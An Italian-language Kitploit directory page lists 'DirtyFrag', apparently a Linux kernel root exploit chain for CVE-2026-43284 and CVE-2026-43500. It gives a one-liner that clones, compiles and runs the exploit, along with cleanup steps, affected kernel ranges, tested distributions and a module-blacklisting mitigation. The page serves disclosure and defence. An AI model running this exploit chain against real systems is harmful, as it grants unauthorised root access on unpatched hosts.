Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DirtyFrag — Catena di exploit del kernel Linux (CVE-2026-43284 e CVE-2026-43500) che ottiene i privilegi di root tramite le vulnerabilità di scrittura nella page cache di xfrm-ESP e RxRPC. | Kitploit
Strumenti/GitHubGitHub/minime794/dirtyfrag
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubminime794/dirtyfrag

DirtyFrag

Catena di exploit del kernel Linux (CVE-2026-43284 e CVE-2026-43500) che ottiene i privilegi di root tramite le vulnerabilità di scrittura nella page cache di xfrm-ESP e RxRPC.

Vedi Repository
6h 11m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dirty-Frag

Linux CVE-2026-43284 & CVE-2026-43500

Copiato da @V4bel :) Grazie :)

Questo documento descrive la classe di vulnerabilità Dirty Frag, scoperta e segnalata per la prima volta da Hyunwoo Kim (@v4bel), che può ottenere privilegi di root sulle principali distribuzioni Linux concatenando la vulnerabilità xfrm-ESP Page-Cache Write (CVE-2026-43284) e la vulnerabilità RxRPC Page-Cache Write (CVE-2026-43500).

Dirty Frag è un caso che estende la classe di bug a cui appartengono Dirty Pipe e Copy Fail. Poiché si tratta di un bug logico deterministico che non dipende da una finestra temporale, non è richiesta alcuna race condition, il kernel non va in panic quando l'exploit fallisce e il tasso di successo è molto elevato.

Per informazioni tecniche dettagliate e la timeline, vedere qui.

root@kitploit:~
xfrm-ESP Page-Cache Write (CVE-2026-43284) è stato corretto nel mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) è stato corretto nel mainline aa54b1d27fe0.

Exploiting : Eseguire solo in engagement autorizzati !!

Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Passo dopo passo :

prima compilare l'exploit, poi eseguire il binario

gcc -O0 -Wall -o exp exp.c -lutil

./exp

!! Pulizia

⚠️ Importante: dopo aver eseguito questo exploit, la page cache è contaminata. Per svuotare la page cache inquinata e garantire la stabilità del sistema, eseguire:

echo 3 > /proc/sys/vm/drop_caches

oppure riavviare il sistema. Versioni interessate

root@kitploit:~
CVE-2026-43284: la vulnerabilità xfrm-ESP Page-Cache Write è in scope da cac2661c53f3 (2017-01-17) fino a f4c50a4034e6 (2026-05-05).
CVE-2026-43500: la vulnerabilità RxRPC Page-Cache Write è in scope da 2dc334f1a63a (2023-06-08) fino a aa54b1d27fe0 (2026-05-10).

In altre parole, la durata effettiva delle vulnerabilità è di circa 9 anni.

Questo Dirty Frag è stato testato sulle seguenti versioni di distribuzione.

root@kitploit:~
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...

Mitigazione

root@kitploit:~
Usare il seguente comando per rimuovere i moduli in cui si verificano le vulnerabilità e svuotare la page cache.

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

root@kitploit:~
Una volta che ciascuna distribuzione esegue il backport di una patch, aggiornare di conseguenza.
Scarica lo strumento